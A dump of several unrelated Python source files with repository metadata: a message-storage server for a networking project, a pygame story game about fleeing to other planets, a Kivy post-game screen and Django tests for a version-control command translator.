''' 3780 Networking Project server @author Rio Lowry, Lezar de Guzmann ''' import json import heapq import threading class MessageStorage(): def __init__(self): self.messages = self.read_from_file() for destination, messagelist in self.messages.items(): # Delete empty lists and heapify the rest if messagelist: heapq.heapify(messagelist) else: del self.messages[destination] def add_message(self, message): # Add a message with its destination as key destination = message["Destination"] if destination not in self.messages: self.messages[destination] = [] heapq.heappush(self.messages[destination], [message["Seq_No"], message]) self.write_to_file() def add_message_to_ip(self, message, ip): # Add a message with ip as key if ip not in self.messages: self.messages[ip] = [] heapq.heappush(self.messages[ip], [message["Seq_No"], message]) self.write_to_file() def add_client(self, ip): # Add a client ip as a destination key if ip not in self.messages: self.messages[ip] = [] def remove_message(self, destination): # Remove and return message for destination with lowest seq no message = heapq.heappop(self.messages[destination])[1] self.write_to_file() return message def write_to_file(self): # Write messages to file try: with open('savedmessages.json','w') as f: json.dump(self.messages, f) except IOError, e: print "I/O error: %s" % e def read_from_file(self): # Read messages from file try: with open('savedmessages.json','r') as f: return json.load(f) except IOError, e: print "I/O error: %s" % e return {} class ClientList(): def __init__(self): self.active_clients = [] self.clients = [] self.timer = threading.Timer(600.0, self.reset_clients) self.timer.daemon = True self.timer.start() def add_client(self, ip): # Add a client to the list if ip not in self.clients: self.clients.append(ip) def add_active_client(self, ip): # Make client active if ip not in self.active_clients: self.active_clients.append(ip) def client_is_active(self, ip): # Return false if ip is not in clients return ip in self.clients def reset_clients(self): # Function to reset the list of clients to those active self.clients = self.active_clients self.active_clients = [] print "CLIENTS RESET. Active clients: %s" % (self.clients, ) self.timer = threading.Timer(600.0, self.reset_clients) self.timer.daemon = True self.timer.start() def stop_timer(self): self.timer.cancel()
UTF-8
Python
false
false
2,013
8,418,135,900,434
2cefd4164b4da9d2a451058ab09b35a63dc01116
b22cbe574c6fd43fde3dc82441805917b5996bb2
/test/__init__.py
60db52edf219630178b07dfd1f69a0edfb5bf388
[]
no_license
matthagy/hlab
https://github.com/matthagy/hlab
7a7b16526ee06f9b6211e387795e09c6438b536c
1bea77cf6df460f1828f99f3a54251d20e2d0f3d
refs/heads/master
2021-01-25T03:26:52.311278
2012-07-23T16:20:11
2012-07-23T16:20:11
2,352,334
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''Test of hlab '''
UTF-8
Python
false
false
2,012
8,014,408,982,061
8583bdf632fb523acce13d85125a3f1952c19e77
6a84450928ca6d23793bbc814cb910a5f3c07a8f
/gamelib/InTheEnd.py
fdaaa59ba15f6188b335aca4876ed4e9991e50c5
[ "MIT" ]
permissive
mcanultyfamily/InTheEnd
https://github.com/mcanultyfamily/InTheEnd
ce11d23a0e9b51582f5d34cb9a613177831535eb
798f9a63e65209a932170d57d37186db36fe87b4
refs/heads/master
2016-09-05T18:22:02.970320
2012-09-15T23:58:06
2012-09-15T23:58:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import time import datetime import pygame import utils import data WINDOW_WIDTH = 800 WINDOW_HEIGHT = 500 class ClockPane(utils.Pane): end_time = None # End-Time survives multiple ClockPanes... time_left = None clock_ticking = False tick_sound = None tick_base_volume = None def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 0, 800, 30, (0,0,0)) self.ticks_to_play = 0 self.fade_out_ticks = 3 self.time_str = "" def set_time(self, time_str): self.time_str = time_str self.render() def render(self): self.g.screen.blit(self.background, (self.x_offset, self.y_offset)) self.render_text(self.time_str, utils.GameFont("monospace", 22, (255, 40, 40)), 10, 2) def start_clock(self, seconds, restart=False): if restart: ClockPane.clock_ticking = False if not ClockPane.clock_ticking: ClockPane.tick_sound = pygame.mixer.Sound("default_cant_move_back.wav") ClockPane.tick_base_volume = ClockPane.tick_sound.get_volume() ClockPane.endtime = datetime.datetime.now()+datetime.timedelta(seconds=seconds) ClockPane.clock_ticking = True ClockPane.time_left = ClockPane.endtime-datetime.datetime.now() self.tick() def start_sound(self, ticks=6, fade_out_ticks=3): self.ticks_to_play = ticks self.fade_out_ticks = fade_out_ticks def stop_sound(self): self.ticks_to_play = 0 def play_tick(self): if self.ticks_to_play: if self.fade_out_ticks: volume = ClockPane.tick_base_volume*min(1.0, self.ticks_to_play/(self.fade_out_ticks+1.0)) else: volume = ClockPane.tick_base_volume #print "TICK VOLUME - %s ticks to play, %s fade_out_ticks, %0.4f base vol : %0.4f vol" % (self.ticks_to_play, self.fade_out_ticks, self.tick_base_volume, volume) ClockPane.tick_sound.set_volume(volume) ClockPane.tick_sound.play() self.ticks_to_play -= 1 def stop_clock(self): ClockPane.clock_ticking = False def tick(self): if ClockPane.clock_ticking: time_left = ClockPane.endtime-datetime.datetime.now() if self.ticks_to_play and int(time_left.seconds)!=int(ClockPane.time_left.seconds): self.play_tick() ClockPane.time_left = time_left time_left = str(time_left)[:-2] self.set_time(time_left) class Possesion(object): def __init__(self, image_file, name=None, full_image=None): self.count = 1 self.image = data.load_image(image_file) if full_image: self.full_image = data.load_image(full_image) else: self.full_image = None if not name: name = image_file.split(".")[0] self.name = name self.rect = None self.selected = None def render(self, g, x, y): if not self.count: return 0, 0 g.screen.blit(self.image, (x, y)) if self.count!=1: g.render_text(str(self.count), utils.GameFont("monospace", 12, (0,0,0)), x, y) self.rect = self.image.get_rect().move(x, y) if self.selected: BORDER = 4 self.rect = self.rect.inflate(BORDER, BORDER) pygame.draw.rect(g.screen, (0,255,0), self.rect, BORDER) return self.rect[2], self.rect[3] # TODO - handle move move to hover... class ItemsPane(utils.Pane): def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 230, 800, 500, (200,180,180)) if hasattr(sit, "g"): self.real_g = sit.g else: self.real_g = g self.render() def add_possession(self, item): self.real_g.add_possession(item) self.render() def remove_possession(self, item): self.real_g.remove_possession(item) self.render() def render(self): self.sit.log("RENDER ITEMS PANE") self.g.screen.blit(self.background, (self.x_offset, self.y_offset)) x = 604 y = 234 max_h = 0 for item in self.real_g.possessions: iw, ih = item.image.get_size() bottom = y+ih if bottom>496: print "TOO MANY POSSESSIONS! - can't print %s" % item.name continue right = x+iw if right>796: x = 604 y += max_h max_h = 0 bottom = y+ih if bottom>496: print "TOO MANY POSSESSIONS! - can't print %s" % item.name continue w, h = item.render(self.g, x, y) max_h = max(max_h, h) x += (w+4) def event_click(self, mouse, mouse_up): need_render = False show_overlay_item = None DOUBLE_CLICK_TIME = 0.1 for item in self.real_g.possessions: if item.rect.collidepoint(mouse): if not item.selected: need_render = True elif time.time()>(item.selected+DOUBLE_CLICK_TIME): show_overlay_item = item item.selected = time.time() elif item.selected: item.selected = False need_render = True if need_render: self.render() if show_overlay_item and not mouse_up: self.sit.show_overlay(show_overlay_item.full_image) class SituationBase(utils.SituationBase): def __init__(self, g): utils.SituationBase.__init__(self, g) size = self.g.screen.get_size() self.background = pygame.Surface(size).convert() self.background.fill((255, 255, 255)) self.panes = {} self.clock_pane = self.add_pane("CLOCK", ClockPane(self)) self.items_pane = self.add_pane("ITEMS", ItemsPane(self)) self.rendered = False def add_pane(self, name, pane): pane.name = name self.panes[name] = pane return pane def event_click(self, mouse, mouse_up): self.log("SITUATION BASE EVENT CLICK") for n, p in self.panes.items(): if p.rect.collidepoint(mouse): self.log("EVENT CLICK : %s" % n) p.event_click(mouse, mouse_up) return def display(self): if not self.rendered: self.render() self.panes['CLOCK'].tick() pygame.display.flip() def render(self): self.log("RENDER Situation Base") self.rendered = True self.g.screen.blit(self.background, (0, 0)) for n, p in self.panes.items(): p.render() class SpinImageSituation(SituationBase): def __init__(self, g, image_file, next_situation_class, time_text, spin_rate=100, rotations=2, press_next=True): SituationBase.__init__(self, g) self.next_situation_class = next_situation_class self.FRAME_RATE = spin_rate self.ROTATE_INCREMENT = 5 self.base_image = data.load_image(image_file) self.base_center = self.base_image.get_rect().center self.main_pane = self.add_pane("PAPER", utils.Pane(self, 0, 0, 600, 500, (255, 255, 255))) self.add_pane("MINIMAP", MapPane(self)) if time_text: self.clock_pane.set_time(time_text) self.current_angle = 0 self.rotations_left = rotations self.need_draw = True if (press_next): font = pygame.font.Font(None, 36) text = font.render("Press Space to continue", 1, (10, 10, 10)) textpos = text.get_rect() textpos.centerx = self.main_pane.background.get_rect().centerx textpos.y = self.main_pane.background.get_rect().bottom - 40 self.main_pane.background.blit(text, textpos) def rotate_image(self): #self.log("Rotations Left %s, current angle: %s" % (self.rotations_left, self.current_angle)) if self.current_angle==0: image = self.base_image rect = image.get_rect() else: image = pygame.transform.rotate(self.base_image, self.current_angle) rect = image.get_rect() rect.center = self.base_center return image, rect def display(self): if self.need_draw: self.main_pane.blit(self.main_pane.background, (0, 0)) if self.rotations_left: for i in range(3): image, rect = self.rotate_image() self.main_pane.blit(image, rect.topleft) self.current_angle += 5 if self.current_angle>=360: self.current_angle = 0 self.rotations_left -= 1 break else: self.main_pane.blit(self.base_image, (0,0)) self.need_draw = False pygame.display.flip() class FirstNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "first_news.png", SecondNewspaperSituation, "Sept. 10, 2312") self.g.add_possession(Possesion("first_news_item.png", "First Newspaper", full_image="first_news.png")) class SecondNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "second_news.png", InvitationSituation, "Sept. 19, 2407") self.g.add_possession(Possesion("second_news_item.png", "Second Newspaper", full_image="second_news.png")) class EmergencyNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "emergencydeclared.png", MainSituation_apartment, "Dec. 19, 2407") self.g.add_possession(Possesion("emergencydeclared_item.png", "Emergency Declared", full_image="emergencydeclared.png")) class InvitationSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "letterforinterview.png", QuizSituation, "Sept 16, 2407", spin_rate=100, rotations=0) self.g.add_possession(Possesion("letterforinterview_item.png", "Interview Invitation", full_image="letterforinterview.png")) class OpeningCredits(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "openingcredits.png", FirstNewspaperSituation, "Sept 19, 2407", spin_rate=100, rotations=0) class ClosingCredits(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "closingcredits.png", None, "Sept 19, 2407", spin_rate=100, rotations=0) def next_situation(self): utils.python_quit = True class QuestionPane(utils.Pane): def __init__(self, sit, width, background, picture, desc, responses, show_next, text_x=None, font_size=20, answer_y=200): utils.Pane.__init__(self, sit, 0, 0, width, 500, (250,250,250)) if background: self.background = background self.width = width self.picture = picture self.desc = desc self.show_next = show_next self.next_button = None self.answer = None self.font_size = font_size if text_x: self.text_x = text_x self.text_y = 25 elif (width > 500): self.text_x = 150 self.text_y = 75 else: self.text_x = 10 self.text_y = 25 self.answer_y = answer_y self.unpressed_font = utils.GameFont("monospace", self.font_size, (0,0,0)) self.pressed_font = utils.GameFont("monospace", self.font_size, (30,148,89)) self.responses = [] x = self.text_x y = self.render_question() width = self.width-(20+x) y = max(self.answer_y, y) for id, response, reply in responses: response = response.strip() if response: ct = utils.ClickableText(self, response, self.unpressed_font, x, y, id, width) ct.reply = reply ct.id = id self.responses.append(ct) y += ct.rect[3]+(self.font_size/5) if not self.responses: self.next_y = y self.show_next = True self.create_next_button() else: self.next_y = 400 self.sit.key_handlers[pygame.K_n] = self._next_key self.sit.key_handlers[pygame.K_RIGHT] = self._next_key self.sit.key_handlers[pygame.K_SPACE] = self._next_key self.sit.key_handlers[pygame.K_RETURN] = self._next_key self.sit.key_handlers[pygame.K_a] = self._select_A self.sit.key_handlers[pygame.K_b] = self._select_B self.sit.key_handlers[pygame.K_c] = self._select_C def render(self): self.sit.log("RENDER QUESTION PANE") if self.background: self.blit(self.background, (0,0)) if self.picture: self.blit(self.picture, (0, 0)) self.render_question() for ct in self.responses: ct.render() self.render_reply() if self.next_button: self.next_button.render() def render_question(self): width = self.width-(20+self.text_x) ignored, rect = self.render_text_wrapped(self.desc, self.unpressed_font, self.text_x, self.text_y, width) return self.text_y+rect[3]+30 def event_click(self, mouse, mouse_up): self.sit.log("event_click %s - %s [next button %s]" % (mouse, mouse_up, bool(self.next_button))) # Handle Next Button if self.next_button and self.next_button.mouse_in_rect(mouse): if mouse_up: self.sit.done = True elif self.next_button.set_font(utils.GameFont("monospace", self.font_size, (80,80,80))): self.next_button.render() return True # check for fake Next button if not self.responses: return True # Check answers answer = None for ct in self.responses: if ct.mouse_in_rect(mouse): answer = ct # Select answer if answer: self.sit.log("Clicked Answer: %s" % answer.text) if mouse_up: self.sit.log("mouse up %s" % answer.text) self.select(answer) return True else: return False def select(self, answer): if not self.responses: self.sit.done = True return if self.answer: # -- Reset the answer text and clear the reply self.answer.set_font(self.unpressed_font) self.answer.render() self.clear_reply() self.answer = None self.answer = answer self.answer.set_font(self.pressed_font) self.answer.render() self.render_reply() self.create_next_button() def clear_reply(self): if self.answer and self.answer.reply: area = pygame.Rect(self.reply_left, self.reply_top, self.reply_width, self.reply_height) self.blit(self.sit.background, (self.reply_left, self.reply_top), area=area) self.blit(self.background, (self.reply_left, self.reply_top), area=area) self.next_y -= self.reply_height self.sit.log("Cleared reply, %s, new next_y: %s" % (area, self.next_y)) def render_reply(self): if self.answer and self.answer.reply: mono_font = utils.GameFont("monospace", 20, (153, 128, 18)) self.reply_top = y = self.next_y self.reply_width = self.w - self.text_x - 10 self.reply_left = self.text_x ignored, rect = self.render_text_wrapped(self.answer.reply, mono_font, self.reply_left, self.reply_top, self.reply_width) self.reply_height = rect[3] area = pygame.Rect(self.reply_left, self.reply_top, self.reply_width, self.reply_height) self.next_y += self.reply_height self.sit.log("Rendered reply, %s, new next_y: %s" % (rect, self.next_y)) def create_next_button(self): if self.show_next and not self.next_button: x = (self.width*2)/3 self.next_button = utils.ClickableText(self, "Next", utils.GameFont("monospace", 20, (0,0,0)), x, self.next_y) def _next_key(self, event): if self.next_button: self.sit.done = True def _select(self, id): if self.responses: resp = self.responses[id] else: resp = None self.select(resp) def _select_A(self, event): self._select(0) def _select_B(self, event): self._select(1) def _select_C(self, event): self._select(2) class QuizSituationBase(SituationBase): questions = {} questions_by_q = {} def __init__(self, g): SituationBase.__init__(self, g) self.FRAME_RATE = 5 badge = data.load_image("fbi_badge.png") self.panes['BADGE'] = utils.Pane(self, 600, 30, 800, 230, (255,255,255), background=badge) self.panes['BADGE'].render() self.clock_pane.set_time("Oct. 3, 2407") if not QuizSituationBase.questions: self.load_questions() def load_questions(self): records = data.read_csv("InterviewQuiz.csv", self.g.game_data) QuizSituationBase.questions = dict([(rec['Number'], rec) for rec in records]) QuizSituationBase.questions_by_q = dict([(rec['Question'], rec) for rec in records]) class QuizSituation(QuizSituationBase): def __init__(self, g, q_num='1'): QuizSituationBase.__init__(self, g) self.this_rec = QuizSituationBase.questions[q_num] background_image = data.load_image("interview_room2.jpg") interviewGuy = pygame.transform.smoothscale(data.load_image("InterviewGuyLarge.png"), (117, 192)); p = QuestionPane(self, 600, background_image, interviewGuy, self.this_rec['Question'], [(c, self.this_rec["Response %s" % c], self.this_rec['Answer to %s' % c]) for c in "ABC"], show_next=True) self.main_pane = self.add_pane("MAIN", p) self.render() self.log("Q: %s" % self.this_rec['Question']) def next_situation(self): if utils.python_quit: return None; self.g.add_quiz_answer(self.this_rec['Question'], self.main_pane.answer.text) q_num = self.this_rec['Next Number'] if q_num in QuizSituationBase.questions: return QuizSituation(self.g, q_num) else: return QuizSummarySituation(self.g) def event_key_any(self, event): pass PLANET_INFO = [ ["EndoDelta", "Endo Delta (aka Emotionally Disturbed)", 1], ["Shokugak", "Shokugaki (aka Shotgun)", 2], ["Mizar3", "Mizar 3 (aka Mystery)", 0], ] class QuizSummarySituation(QuizSituationBase): def __init__(self, g): QuizSituationBase.__init__(self, g) self.main_pane = self.add_pane("MAIN", utils.Pane(self, 0, 0, 600, 500, (255,255,255))) self.calc_score() def calc_score(self): self.score = 0.0 for q, a in self.g.quiz_answers: entry = QuizSituationBase.questions_by_q[q] for c in "ABC": if entry["Response %s" % c]==a: self.add_score(entry['Score %s' % c]) found = True break assert(found) self.log("QUIZ SCORE: %s" % self.score) self.g.game_data['QUIZ_SCORE'] = self.score def add_score(self, value): before = self.score if value.startswith("div "): val = int(value.replace("div ", "").strip()) self.score = self.score/val self.log("Add score %s/%s -> %s" % (before, val, self.score)) elif value.startswith("mult "): val = int(value.replace("mult ", "").strip()) self.score = self.score * val self.log("Add score %s * %s -> %s" % (before, val, self.score)) else: val = int(value.strip()) self.score += val self.log("Add score %s + %s -> %s" % (before, val, self.score)) def render(self): QuizSituationBase.render(self) self.main_pane.render_text("This is you:", utils.GameFont("monospace", 30, (0, 0, 0)), 10, 10) FONT_SIZE = 12 y = 50 for q, a in self.g.quiz_answers: self.main_pane.render_text(q, utils.GameFont("monospace", FONT_SIZE, (0, 0, 0)), 25, y) y += FONT_SIZE+2 self.main_pane.render_text(a, utils.GameFont("monospace", FONT_SIZE, (30,148,89)), 30, y) y += FONT_SIZE+4 self.next_button = utils.ClickableText(self.g, "Next", utils.GameFont("monospace", 20, (0,0,0)), 200,y+40) def next_situation(self): quiz_score = self.g.game_data['QUIZ_SCORE'] if quiz_score>15: idx = 0 elif quiz_score<-15: idx = 1 else: idx = 2 return TicketTo_Base(self.g, idx) def event_click(self, mouse, mouse_up): if mouse_up and self.next_button.mouse_in_rect(mouse): self.done = True def event_key(self, event): self.done = True class Ticket(Possesion): def __init__(self, shortname, fullname): Possesion.__init__(self, "ticket%s_item.png" % shortname, fullname, "ticket%s.png" % shortname) class TicketTo_Base(SpinImageSituation): def __init__(self, g, idx, next_situation=EmergencyNewspaperSituation, time_str="Oct 1st, 2407"): shortname, fullname, other_idx = PLANET_INFO[idx] SpinImageSituation.__init__(self, g, "ticket%s.png" % shortname, next_situation, time_str, spin_rate=100, rotations=0) self.g.add_possession(Ticket(shortname, fullname)) self.g.game_data['HAVE_TICKET_IDX'] = idx self.g.game_data['HAVE_TICKET_TO'] = fullname self.g.game_data['DONT_HAVE_TICKET_TO'] = PLANET_INFO[other_idx][1] class TicketTo_EndoDelta(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 0) class TicketTo_Shokugak(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 1) class TicketTo_Mizar3(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 2) class MapPane(utils.Pane): locations = None def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 30, 800, 230, (140,180,160)) self.background = data.load_image("MiniMap.png") class Location(object): def __init__(self, rec): self.name = rec['Location'] self.x = int(rec['x']) self.y = int(rec['y']) if not MapPane.locations: MapPane.locations = {} for rec in data.read_csv("map_locations.csv", self.g.game_data): if rec['Location']: loc = Location(rec) MapPane.locations[loc.name] = loc if not self.g.movement_path: self.move_to_location("Apartment") else: self.render() def event_click(self, mouse, mouse_up): if self.mouse_in_pane(mouse): x, y = self.window_to_pane_xy(mouse[0], mouse[1]) self.sit.log("CLICKED MAP: %s, %s" % (x, y)) return True else: return False def move_to_location(self, loc_name): if self.g.movement_path and \ self.g.movement_path[-1].name==loc_name: return location = MapPane.locations[loc_name] self.g.movement_path.append(location) self.render() def render(self): self.sit.log("RENDER MAP PANE") self.blit(self.background, (0, 0)) points = [(loc.x+self.x_offset, loc.y+self.y_offset) for loc in self.g.movement_path] if len(points)>1: closed = False width = 6 pygame.draw.lines(self.g.screen, (255,0,0), closed, points, width) radius = 6 width = 0 pygame.draw.circle(self.g.screen, (255,0,0), points[-1], radius, width) class QuestionSituation(SituationBase): def __init__(self, g, csv_path): SituationBase.__init__(self, g) self.FRAME_RATE = 22 self.log("Reading config %s" % csv_path) self.scenes = dict([(rec['Number'], rec) for rec in data.read_csv(csv_path, self.g.game_data)]) self.map_pane = self.add_pane("MINIMAP", MapPane(self)) self.set_current_scene('1') def event_response_one(self, event): self._event_response("A") def event_response_two(self, event): self._event_response("B") def event_response_three(self, event): self._event_response("C") def event_click(self, mouse, mouse_up): SituationBase.event_click(self, mouse, mouse_up) if self.main_pane.answer: NUM_ID_TO_ALPHA_ID = {1:'A', 2:'B', 3:'C'} self._event_response(NUM_ID_TO_ALPHA_ID[self.main_pane.answer.id]) def event_key_any(self, event): pass def _event_response(self, id): next_scene = self.curr_scene.get('%s Next Number' % id) self.log("_event_response id: %s, next scene: %s" % (id, next_scene)) if not next_scene or next_scene in ['0', '-1']: self.done = True else: self.set_current_scene(next_scene) def set_current_scene(self, scene_id): self.curr_scene = self.scenes[scene_id] if self.curr_scene.get("Item"): self.items_pane.add_possession(Possesion(self.curr_scene['Item'])) if self.curr_scene.get("Location"): self.map_pane.move_to_location(self.curr_scene['Location']) picture_file = self.curr_scene.get("Picture to display") if picture_file: picture = data.load_image(picture_file) else: picture = None special_a_number = self.curr_scene['A Next Number'] if not special_a_number or special_a_number in ['0','-1']: responses = [] for k in [pygame.K_1, pygame.K_2, pygame.K_3]: if k in self.key_handlers: del self.key_handlers[k] else: responses = [(idx+1, self.curr_scene["Response %s" % c].strip(), "") for idx, c in enumerate("ABC")] self.key_handlers[pygame.K_1] = self.event_response_one self.key_handlers[pygame.K_2] = self.event_response_two self.key_handlers[pygame.K_3] = self.event_response_three p = QuestionPane(self, 600, None, picture, self.curr_scene['Scenario'], responses, show_next=False, text_x = 20, font_size=18, answer_y=250) self.main_pane = self.add_pane("MAIN", p) self.render() class MainSituation(QuestionSituation): def __init__(self, g, sit_file, next_situation_class): QuestionSituation.__init__(self, g, sit_file) self.FRAME_RATE = 22 self.log("Initialiing mainsituation - sit_file %r" % sit_file) self.next_situation_class = next_situation_class self.clock_pane.start_clock(60*60*2) # 2 hours #self.clock_pane.start_sound(10, 5) self.render() def next_situation(self): self.log("next_situation: entering") if utils.python_quit: self.log("next_situation: quit") sit = None elif self.curr_scene['A Next Number']=='0': sit = self.special_next_situation(self.curr_scene['B Next Number']) self.log("next_situation: special: %s" % sit) elif self.curr_scene['A Next Number']=='-1': sit = self.game_over() self.log("next_situation: game over: %s" % sit) else: sit = self.next_situation_class(self.g) return sit def special_next_situation(self, id): """ Override this to handle 'special situations' based on responses """ return self.next_situation_class(self.g) def game_over(self): """Override this to handle non-standard game-over paths""" return ClosingCredits(self.g) class MainSituation_apartment(MainSituation): def __init__(self, g, sit_file="apartment.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_initialstreet) class MainSituation_initialstreet(MainSituation): def __init__(self, g, sit_file="initialstreet.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_buildingonfire) class MainSituation_religiousnuts(MainSituation): def __init__(self, g, sit_file="religiousnuts.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_motherandchild) def special_next_situation(self, value): if value =='2': self.g.friendsMiddleSchoolers = True else: self.g.friendsMiddleSchoolers = False self.log("friendsMiddleSchoolers: %s, value: %r"%(self.g.friendsMiddleSchoolers, value)) return MainSituation.special_next_situation(self,value) class MainSituation_buildingonfire(MainSituation): def __init__(self, g, sit_file="buildingonfire.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_religiousnuts) def special_next_situation(self, value): if value !='0': self.g.savedPeople = True else: self.g.savedPeople = False self.log("savedPeople: %s, value: %r"%(self.g.savedPeople, value)) return MainSituation.special_next_situation(self, value) class MainSituation_motherandchild(MainSituation): def __init__(self, g, sit_file="motherandchild.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral1) def special_next_situation(self, value): if value=='3': have_idx = self.g.game_data['HAVE_TICKET_IDX'] shortname, fullname, get_idx = PLANET_INFO[have_idx] return TicketTo_Base(self.g, get_idx, next_situation=self.next_situation_class, time_str=None) else: return MainSituation.special_next_situation(self, value) class MainSituation_spaceportgeneral2(MainSituation): def __init__(self, g, sit_file="spaceportgeneral2.csv"): MainSituation.__init__(self, g, sit_file, ClosingCredits) class MainSituation_spaceportgeneral1(MainSituation): def __init__(self, g, sit_file="spaceportgeneral1.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): if (self.g.savedPeople): return MainSituation_spaceportsavedpeople(self.g) elif (self.g.friendsMiddleSchoolers): return MainSituation_spaceportmiddleschool(self.g) else: self.log("HERE! I'm HERE!") return MainSituation_spaceportgeneral2(self.g) class MainSituation_spaceportsavedpeople(MainSituation): def __init__(self, g, sit_file="spaceportsavedpeople.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): if (self.g.friendsMiddleSchoolers): return MainSituation_spaceportmiddleschool(self.g) else: return MainSituation_spaceportgeneral2(self.g) class MainSituation_spaceportmiddleschool(MainSituation): def __init__(self, g, sit_file="spaceportmiddleschool.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): return MainSituation_spaceportgeneral2(self.g) # TODO: layout blocks... class InTheEndGame(utils.GameBase): def __init__(self): utils.GameBase.__init__(self) DISPLAY_SIZE = (800, 500) DISPLAY_MODE = 1 self.init_display(DISPLAY_SIZE, DISPLAY_MODE) pygame.display.set_caption("In the End") #self.screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) pygame.key.set_repeat(250, 50) self.game_data = {} self.game_data['HAVE_TICKET_IDX'] = 0 self.game_data['HAVE_TICKET_TO'] = 'TEST HAVE PLANET' self.game_data['DONT_HAVE_TICKET_TO'] = "TEST OTHER PLANET" self.quiz_answers = [] self.possessions = [] self.movement_path = [] self.savedPeople = False self.friendsMiddleSchoolers = False def add_possession(self, item): if item.name in self.game_data: self.game_data[item.name].count += 1 else: self.possessions.append(item) self.game_data[item.name] = item def remove_possession(self, name): item = self.game_data[name] item.count -= 1 if not item.count: del self.game_data[name] self.possessions.remove(item) def make_opt_epilog(self): return "" def add_quiz_answer(self, q, a): self.game_data[q] = a self.quiz_answers.append([q,a]) def first_situation(self): return OpeningCredits(self) def _jump_to_situation(self): if self.jump_to.endswith(".csv"): self.jump_to = "MainSituation_%s" % self.jump_to.split(".csv")[0] sit = globals()[self.jump_to](self) utils._log("JUMPING TO SITUATION: %s (%s)" % (self.jump_to, sit.__class__.__name__)) return sit if __name__ == '__main__': utils.main(InTheEndGame)
UTF-8
Python
false
false
2,012
824,633,728,404
8cf70794e87e8013b04ba4179231847d4f2ae87c
38004a40c21ab98a1a538b0e1c1ca4aa33d19525
/client/post_game.py
d73c56f024a135e85e7600592a1015af9bee4c39
[]
no_license
alexmojaki/spylight
https://github.com/alexmojaki/spylight
eb84a82c126644c265b26dafb86b58bad829bf2e
636717137c2617e3d6bdc123d9668b1bf06151d9
refs/heads/master
2020-03-22T12:19:44.563940
2013-05-22T12:29:51
2013-05-22T12:29:51
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- from kivy.lang import Builder from kivy.uix.screenmanager import Screen from client import utils from client.character import teams class PostGameScreen(Screen): def __init__(self, app, data, **kwargs): Builder.load_file(utils.kvPath.format('post_game_screen')) self.game_duration = str(data['ttime']) self.win_msg = teams[data['winners']]['win_msg'] self.app = app super(PostGameScreen, self).__init__(**kwargs) def quit(self): self.app.stop()
UTF-8
Python
false
false
2,013
5,755,256,190,723
74233936b35b5245456914f5ce1046c4cf1ddf5a
5af8120729ce2360469c42acc9214dc31e262a2a
/vcstranslator_project/apps/translator/tests.py
bb0d94ceff9712473784aca7442a689756198927
[ "BSD-2-Clause" ]
permissive
2215/vcs-translator
https://github.com/2215/vcs-translator
91ed6d11ba2852b6a9a4718e62e1e6bfa5aa2c53
ad4bce1f3515e2fe44f1a19d0a5960ea2ff8f6b9
refs/heads/master
2018-04-14T13:52:58.666694
2014-03-21T21:00:40
2014-03-21T21:00:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.test import TestCase from translator.forms import TranslationForm from translator.models import FailedTranslation from translator.utils import Translator class TranslationFormTests(TestCase): def test_clean_command(self): f = TranslationForm({"command": ""}) self.assertFalse(f.is_valid()) self.assertEqual(f.errors["command"], ["This field is required."]) f = TranslationForm({"command": "arch commit", "vcs": "git"}) self.assertFalse(f.is_valid()) self.assertEqual(f.errors["command"], ["Command must start with a valid VCS (bzr, git, hg, svn)."]) f = TranslationForm({"command": "svn commit", "vcs": "git"}) self.assertTrue(f.is_valid()) class TranslatorTests(TestCase): def assert_translates(self, translator, command, result): r = translator.translate(command) self.assertTrue(r.success) self.assertEqual(r.result, result) def assert_cant_handle_yet(self, translator, command): r = translator.translate(command) self.assertFalse(r.success) self.assertTrue(r.result.startswith("We can't handle this yet")) def assert_cant_handle(self, translator, command): r = translator.translate(command) self.assertFalse(r.success) self.assertEqual(r.result, "This VCS doesn't support this operation") def test_x_to_x(self): t = Translator("svn", "svn") self.assert_translates(t, "log", "svn log") def test_svn_to_git(self): t = Translator("svn", "git") self.assert_translates(t, "commit", "git commit -a && git push") self.assert_translates(t, "ci", "git commit -a && git push") self.assert_translates(t, "checkout", "git clone") self.assert_translates(t, "co", "git clone") self.assert_translates(t, "add", "git add") self.assert_translates(t, "add file.txt", "git add file.txt") self.assert_translates(t, "add some/other/file.txt", "git add some/other/file.txt") self.assert_translates(t, "update", "git pull") self.assert_translates(t, "status", "git status") self.assert_translates(t, "revert file.txt", "git checkout file.txt") self.assert_cant_handle(t, "") def test_git_to_svn(self): t = Translator("git", "svn") self.assert_translates(t, "pull", "svn up") self.assert_translates(t, "clone", "svn checkout") self.assert_translates(t, "status", "svn status") self.assert_translates(t, "diff", "svn diff") self.assert_translates(t, "log", "svn log") self.assert_cant_handle(t, "push") def test_hg_to_git(self): t = Translator("hg", "git") self.assert_translates(t, "pull", "git fetch") self.assert_translates(t, "commit", "git commit -a") self.assert_translates(t, "push", "git push") self.assert_translates(t, "diff", "git diff") self.assert_translates(t, "paths", "git remote -v") self.assert_translates(t, "record", "git add -p && git commit") 